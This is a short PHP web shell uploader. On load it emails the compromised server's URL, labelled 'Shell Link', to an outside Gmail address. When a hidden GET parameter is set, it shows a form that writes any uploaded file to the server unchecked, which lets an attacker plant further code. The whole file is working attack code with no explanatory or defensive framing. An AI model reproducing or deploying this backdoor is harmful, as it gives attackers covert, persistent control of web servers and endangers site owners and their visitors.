<?php 

$ip = getenv("REMOTE_ADDR");
$hostname = gethostbyaddr($ip);
$bilsmg = "Shell Link : http://" . $_SERVER['SERVER_NAME'] . $_SERVER['REQUEST_URI'] ."\r\n";
$bilsnd ="mr.root003@gmail.com"; 
$bilsub = "New Shell Link  $ip";
$bilhead = "From: Result@Mrx.com";
$bilhead .= $_POST['eMailAdd']."\n";
$bilhead .= "MIME-Version: 1.0\n";
$arr=array($bilsnd, $IP);
foreach ($arr as $bilsnd)
mail($bilsnd,$bilsub,$bilsmg,$bilhead,$message);

$kolni  = $_GET['kolni'];
if($kolni== 'ok'){
$kolnio = $_FILES['file']['name'];
$kolniok  = $_FILES['file']['tmp_name'];
echo "<form method='POST' enctype='multipart/form-data'>
 <input type='file'name='file' />
 <input type='submit' value='up' />
</form>";
move_uploaded_file($kolniok,$kolnio); 
}

?>